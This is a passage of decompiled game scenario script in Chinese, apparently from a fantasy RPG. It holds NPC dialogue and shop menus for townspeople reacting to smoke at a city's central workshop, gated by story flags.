"就只能从阳台上跳下来了。\x02", ) ) CloseMessageWindow() label("loc_17A7") Jump("loc_17F4") label("loc_17AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_17F4") ChrTalk( 0xFE, "痛、痛痛痛……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不小心踏空楼梯，\x01", "扭到腰了。\x02", ) ) CloseMessageWindow() label("loc_17F4") TalkEnd(0xFE) Return() # Function_19_1676 end def Function_20_17F8(): pass label("Function_20_17F8") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_18AC") ChrTalk( 0xFE, ( "我正在做实验的时候，\x01", "突然冒起了漫天烟雾……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不管怎么说，\x01", "我是拼命逃出来了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我想大家也\x01", "应该都逃出来了吧……\x02", ) ) CloseMessageWindow() label("loc_18AC") TalkEnd(0xFE) Return() # Function_20_17F8 end def Function_21_18B0(): pass label("Function_21_18B0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_18CD") OP_22(0x192, 0x0, 0x64) ChrTalk( 0xFE, "喵呀～噢！\x02", ) CloseMessageWindow() label("loc_18CD") TalkEnd(0xFE) Return() # Function_21_18B0 end def Function_22_18D1(): pass label("Function_22_18D1") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_END)), "loc_1B82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 5)), scpexpr(EXPR_END)), "loc_1951") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() Jump("loc_1B7F") label("loc_1951") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x30, 0x0, 0x10)"), scpexpr(EXPR_END)), "loc_19D1") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_19D1") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x2D, 0x0, 0x4)"), scpexpr(EXPR_END)), "loc_1A6C") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "……唔，这种情况下\x01", "还是不要谈工作的事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是不好意思，\x01", "明天再把书给我吧。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_1A6C") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x2D, 0x0, 0x2)"), scpexpr(EXPR_END)), "loc_1B08") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "……唔，这种情况下\x01", "还是不要谈工作的事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "委托的事\x01", "只好拖到明天了。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_1B08") ChrTalk( 0xFE, ( "呼，因为刚才拼命地跑，\x01", "身上的肌肉痛得受不了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) label("loc_1B7F") Jump("loc_1BD4") label("loc_1B82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1BD4") ChrTalk( 0xFE, ( "唉，\x01", "好久没有这样剧烈运动过了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "哎呀哎呀，痛啊……\x02", ) CloseMessageWindow() label("loc_1BD4") TalkEnd(0xFE) Return() # Function_22_18D1 end def Function_23_1BD8(): pass label("Function_23_1BD8") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1C78") ChrTalk( 0x9, ( "#800F博士应该在三楼的工作室。\x01", "　\x02\x03", "首先去那里确认一下。\x01", "如果危险的话就马上撤离。\x02", ) ) CloseMessageWindow() label("loc_1C78") TalkEnd(0xFE) Return() # Function_23_1BD8 end def Function_24_1C7C(): pass label("Function_24_1C7C") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1CEA") ChrTalk( 0x8, ( "#150F我也想一起去呀。\x01", "但没办法了……\x02\x03", "小艾你们千万要小心呀。\x01", "　\x02", ) ) CloseMessageWindow() label("loc_1CEA") TalkEnd(0xFE) Return() # Function_24_1C7C end def Function_25_1CEE(): pass label("Function_25_1CEE") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1D4B") ChrTalk( 0xFE, ( "客、客人，\x01", "你们都顺利逃出来了啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "这、这烟也太大了。\x02", ) CloseMessageWindow() label("loc_1D4B") TalkEnd(0xFE) Return() # Function_25_1CEE end def Function_26_1D4F(): pass label("Function_26_1D4F") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1DC8") ChrTalk( 0xFE, ( "哪里都找不到\x01", "拉赛尔博士啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "说不定……\x01", "难道还在工房里面吗……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "啊，该怎么办才好。\x02", ) CloseMessageWindow() label("loc_1DC8") TalkEnd(0xFE) Return() # Function_26_1D4F end def Function_27_1DCC(): pass label("Function_27_1DCC") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1DEF") ChrTalk( 0xFE, "鲁迪，你没事吧？\x02", ) CloseMessageWindow() label("loc_1DEF") TalkEnd(0xFE) Return() # Function_27_1DCC end def Function_28_1DF3(): pass label("Function_28_1DF3") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1E57") ChrTalk( 0xFE, "咳咳、咳咳。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "烟、烟……\x01", "咳咳、咳咳咳、咳咳。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "肺、肺……\x01", "咳咳、咳咳！\x02", ) ) CloseMessageWindow() label("loc_1E57") TalkEnd(0xFE) Return() # Function_28_1DF3 end def Function_29_1E5B(): pass label("Function_29_1E5B") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_1F46") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 5)), scpexpr(EXPR_END)), "loc_1EE1") ChrTalk( 0xFE, ( "不过……\x01", "那些从里面出来的\x01", "穿着军装的家伙是谁呀？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "明明那么大的烟，\x01", "他们却好像一点事也没有。\x02", ) ) CloseMessageWindow() Jump("loc_1F43") label("loc_1EE1") OP_A2(0xD) ChrTalk( 0xFE, ( "中央工房\x01", "开始冒烟的时候，\x01", "我可紧张坏了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "呼，都怪这烟，\x01", "喉咙又开始渴了。\x02", ) ) CloseMessageWindow() label("loc_1F43") Jump("loc_2035") label("loc_1F46") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1F85") ChrTalk( 0xFE, "啊啊啊，怎么会这样！\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "到、到底\x01", "发生什么事情了。\x02", ) ) CloseMessageWindow() Jump("loc_2035") label("loc_1F85") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_2035") ChrTalk( 0xFE, ( "在整个王国中，\x01", "穿着作业服的驾驶员也只有我一个了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过，这和衣服没有关系，\x01", "关键在于技术。\x02", ) ) CloseMessageWindow() label("loc_2035") TalkEnd(0xFE) Return() # Function_29_1E5B end def Function_30_2039(): pass label("Function_30_2039") TalkBegin(0x18) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 1, ( "对话\x01", # 0 "买东西\x01", # 1 "离开\x01", # 2 ) ) MenuEnd(0x0) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2099") OP_0D() OP_A9(0x4D) OP_56(0x0) TalkEnd(0x18) Return() label("loc_2099") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_20AA") TalkEnd(0x18) Return() label("loc_20AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_2126") ChrTalk( 0x18, ( "军队的警备飞艇\x01", "好像停在港口呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "又没有发生什么事件，\x01", "实在是很少见呢。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2126") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_221B") ChrTalk( 0x18, "哟，辛苦了。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "前些日子，\x01", "进出工房船的人好频繁呢，\x01", "不过这两天又恢复平静了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "今天的飞艇坪\x01", "从早上开始就很安静。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_221B") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_22FA") ChrTalk( 0x18, "哟，你们今天也很忙嘛。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "说到忙，\x01", "刚才雷曼那家伙\x01", "慌张地跑向飞艇坪了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "看来很着急\x01", "要出动工房船的样子。\x01", "他还真是辛苦呢。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_22FA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_2367") ChrTalk( 0x18, "哟，早上好。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "早上最好还是\x01", "喝杯营养丰富的饮料。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2367") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_241E") ChrTalk( 0x18, "哟，这么晚还在辛苦工作啊。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "哎呀哎呀，\x01", "今天也累得要命。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "差不多该关店了，\x01", "想要什么就快点选吧。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_241E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2532") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_24AA") ChrTalk( 0x18, ( "从中央工房出来的\x01", "穿蓝色军装的家伙，\x01", "到底是什么人啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "不知道那些军人\x01", "在工房里面干了些什么。\x02", ) ) CloseMessageWindow() Jump("loc_252F") label("loc_24AA") OP_A2(0xB) ChrTalk( 0x18, ( "呼～\x01", "看来骚动总算结束了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "说起来，那些军人\x01", "在那么浓重的烟雾里干了什么呢。\x02", ) ) CloseMessageWindow() label("loc_252F") Jump("loc_2934") label("loc_2532") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_259A") ChrTalk( 0x18, ( "这、这种时候\x01", "必须冷静地行动！\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "那么，\x01", "大家请先喝点清凉的饮料，\x01", "稍微冷静一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_259A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_26B9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_2632") ChrTalk( 0x18, ( "那边的雷曼\x01", "其实是飞艇的驾驶员。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "我说的飞艇\x01", "不是定期船而是工房船。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "嗯，\x01", "反正都是在天上飞的家伙啦。\x02", ) ) CloseMessageWindow() Jump("loc_26B6") label("loc_2632") OP_A2(0xB) ChrTalk( 0x18, ( "那边的雷曼\x01", "怎么看都是个维修员吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "不过，\x01", "其实他是飞艇的驾驶员哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "哈哈哈～\x01", "真是人不可貌相啊。\x02", ) ) CloseMessageWindow() label("loc_26B6") Jump("loc_2934") label("loc_26B9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_END)), "loc_27FB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_2772") ChrTalk( 0x18, ( "做生意不只是买卖商品，\x01", "还必须要考虑经营的手段。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "想开间有人情味的店，\x01", "嘴上说起来简单，\x01", "但是实现起来却很难呢。\x02", ) ) CloseMessageWindow() Jump("loc_27F8") label("loc_2772") OP_A2(0xB) ChrTalk( 0x18, ( "我们的愿望是\x01", "拥有一间属于我们自己的店子，\x01", "就算规模很小也好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "可以的话，最好能开间\x01", "像这座城里的『贝尔杂货店』\x01", "那样有人情味的小店。\x02", ) ) CloseMessageWindow() label("loc_27F8") Jump("loc_2934") label("loc_27FB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_END)), "loc_2876") ChrTalk( 0x18, ( "对面卖花的爱玲\x01", "是我的妹妹。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "如果可以的话，\x01", "希望大家也到那边去看看。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2876") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2934") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_28E1") ChrTalk( 0x18, ( "要不要喝点\x01", "清凉的饮料呀？\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "我这里卖的饮料不仅美味，\x01", "对身体也很有益哦。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_28E1") OP_A2(0xB) ChrTalk( 0x18, "哟，辛苦了。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "要不要喝点\x01", "清凉的饮料呀？\x02", ) ) CloseMessageWindow() label("loc_2934") TalkEnd(0x18) Return() # Function_30_2039 end def Function_31_2938(): pass label("Function_31_2938") TalkBegin(0x19) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 1, ( "对话\x01", # 0 "买东西\x01", # 1 "离开\x01", # 2 ) ) MenuEnd(0x0) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2998") OP_0D() OP_A9(0x4E) OP_56(0x0) TalkEnd(0x19) Return() label("loc_2998") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_29A9") TalkEnd(0x19) Return() label("loc_29A9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_2A09") ChrTalk( 0x19, ( "哎，从飞艇坪那边\x01", "传来了汽笛的声音……\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, "……发生什么事了？\x02", ) CloseMessageWindow() Jump("loc_2D99") label("loc_2A09") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_2A89") ChrTalk( 0x19, ( "来，请看一看。\x01", "这里卖的都是很漂亮的花哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "忘记讨厌的事，\x01", "买一盆来舒缓心情吧。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2A89") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_2B1A") ChrTalk( 0x19, ( "啊，客人们都在议论最近的事情，\x01", "没人来好好欣赏花了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "毕竟发生了那样的事情……\x01", "不过我还是觉得有些寂寞呢。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2B1A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_2B59") ChrTalk( 0x19, "啊，早上好。\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "请随意看吧。\x01", "就算是只闻闻花香\x01", "也能让你心情愉快的。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2B59") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_2BA4") ChrTalk( 0x19, "啊，晚上好。\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "虽然马上要关店了，\x01", "不过趁现在挑选鲜花也没关系。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2BA4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2C34") ChrTalk( 0x19, ( "我正想着烟可能快要散了，\x01", "工房里就出来了几位军人。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "难道是他们\x01", "把烟止住的吗？\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2C34") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_2C53") ChrTalk( 0x19, ( "不、不好了！\x01", "怎么回事！？\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2C53") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_2CC2") ChrTalk( 0x19, ( "蔡斯城里的绿色\x01", "越来越少了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "就算一次也好，\x01", "好想去参观一下那个\x01", "以花闻名的玛诺利亚村啊。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2CC2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2D40") ChrTalk( 0x19, ( "那边卖饮料的\x01", "是我的哥哥哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "我们的梦想是兄妹一起加油，\x01", "将来开间属于自己的店子。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2D40") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2D99") ChrTalk( 0x19, "欢迎光临～\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "这里有各种漂亮的鲜花，\x01", "请各位客人慢慢观赏。\x02", ) ) CloseMessageWindow() label("loc_2D99") TalkEnd(0x19) Return() # Function_31_2938 end def Function_32_2D9D(): pass label("Function_32_2D9D") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2E42") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 6)), scpexpr(EXPR_END)), "loc_2DF3") ChrTalk( 0xFE, "呼……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "喝了点饮料，\x01", "终于放松下来了。\x02", ) ) CloseMessageWindow() Jump("loc_2E42") label("loc_2DF3") OP_A2(0x6) ChrTalk( 0xFE, "呼……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "这个案件真是让人震惊啊。\x01", "没办法安心回去工作了。\x02", ) ) CloseMessageWindow() label("loc_2E42") TalkEnd(0xFE) Return() # Function_32_2D9D end def Function_33_2E46(): pass label("Function_33_2E46") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2F84") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 7)), scpexpr(EXPR_END)), "loc_2EEF") ChrTalk( 0xFE, ( "你们没事实在是太好了，\x01", "不过没看到拉赛尔呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "虽然如果他没事的时候\x01", "就会给别人带来各种各样的麻烦，\x01", "不过还是有点担心他啊……\x02", ) ) CloseMessageWindow() Jump("loc_2F84") label("loc_2EEF") OP_A2(0x7) ChrTalk( 0xFE, ( "哦哦，伊格尔。\x01", "你没受伤真是太好了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "是从紧急楼梯下来的吗？\x01", "想必一定很累吧。\x02", ) ) CloseMessageWindow() label("loc_2F84") TalkEnd(0xFE) Return() # Function_33_2E46 end def Function_34_2F88(): pass label("Function_34_2F88") TalkBegin(0xFE) TalkEnd(0xFE) Return() # Function_34_2F88 end def Function_35_2F8F(): pass label("Function_35_2F8F") TalkBegin(0xFE) TalkEnd(0xFE) Return() # Function_35_2F8F end def Function_36_2F96(): pass label("Function_36_2F96") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_303E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_2FE6") ChrTalk( 0xFE, ( "亲卫队的制服……\x01", "的确是让人在意呀。\x02", ) ) CloseMessageWindow() Jump("loc_303E") label("loc_2FE6") OP_A2(0x0) ChrTalk( 0xFE, ( "工房袭击犯竟然\x01", "穿着亲卫队的制服吗。\x02", ) ) CloseMessageWindow() label("loc_303E") TalkEnd(0xFE) Return() # Function_36_2F96 end def Function_37_3042(): pass label("Function_37_3042") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_3159") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_30AF") ChrTalk( 0xFE, ( "呼，\x01", "越来越想不明白了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "买盆花来\x01", "调节一下心情吧……\x02", ) ) CloseMessageWindow() Jump("loc_3156") label("loc_30AF") OP_A2(0x1) ChrTalk( 0xFE, "尽管如此……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "袭击中央工房的犯人\x01", "到现在都还没抓到吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "王国军和游击士协会\x01", "到底都在干什么呀。\x02", ) ) CloseMessageWindow() label("loc_3156") Jump("loc_34EB") label("loc_3159") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_3204") ChrTalk( 0xFE, ( "很多人都说\x01", "从工房出来的是穿蓝色军装的军人，\x01", "所以应该是不会有错的。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "而且温丝也说他看见了。\x01", "亲卫队果然很可疑啊。\x02", ) ) CloseMessageWindow() Jump("loc_34EB") label("loc_3204") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_3474") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_328F") ChrTalk( 0xFE, ( "我一要买什么，\x01", "温丝就处处有意见。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是的，\x01", "这个孩子就喜欢斤斤计较。\x02", ) ) CloseMessageWindow() Jump("loc_3471") label("loc_328F") OP_A2(0x1) TurnDirection(0xD, 0x107, 400) ChrTalk( 0xFE, ( "呀，提妲，\x01", "在为客人带路吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#060F啊，您好，阿利瑟阿姨。\x02\x03", "在挑选鲜花吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "哎，是呀……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我一要买什么，\x01", "温丝就处处有意见。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是的，\x01", "这个孩子就喜欢斤斤计较。\x02", ) ) CloseMessageWindow() TurnDirection(0x10, 0xD, 400) ChrTalk( 0x10, ( "不是我斤斤计较，\x01", "而是妈妈太浪费啦。\x02", ) ) CloseMessageWindow() OP_8C(0x10, 0, 300) OP_62(0xD, 0x0, 2000, 0xC, 0xD, 0xFA, 0x2) OP_22(0x31, 0x0, 0x64) Sleep(1000) ChrTalk( 0xFE, "你说什么！？\x02", ) CloseMessageWindow() OP_62(0x107, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) OP_22(0x31, 0x0, 0x64) Sleep(1000) ChrTalk( 0x107, "#065F哎，这个……请别生气……\x02", ) CloseMessageWindow() label("loc_3471") Jump("loc_34EB") label("loc_3474") ChrTalk( 0xFE, "哇，好漂亮的花呀。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过种在阳台上的话，\x01", "颜色有些不合适。\x02", ) ) CloseMessageWindow() label("loc_34EB") TalkEnd(0xFE) Return() # Function_37_3042 end def Function_38_34EF(): pass label("Function_38_34EF") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_35C4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_END)), "loc_358D") ChrTalk( 0xFE, ( "就连亲卫队\x01", "也在这里出现了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果顺利的话，\x01", "我就能出名啦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "决定了！\x01", "我一定要成为工房的接待小姐。\x02", ) ) CloseMessageWindow() Jump("loc_35C4") label("loc_358D") OP_A2(0x2) 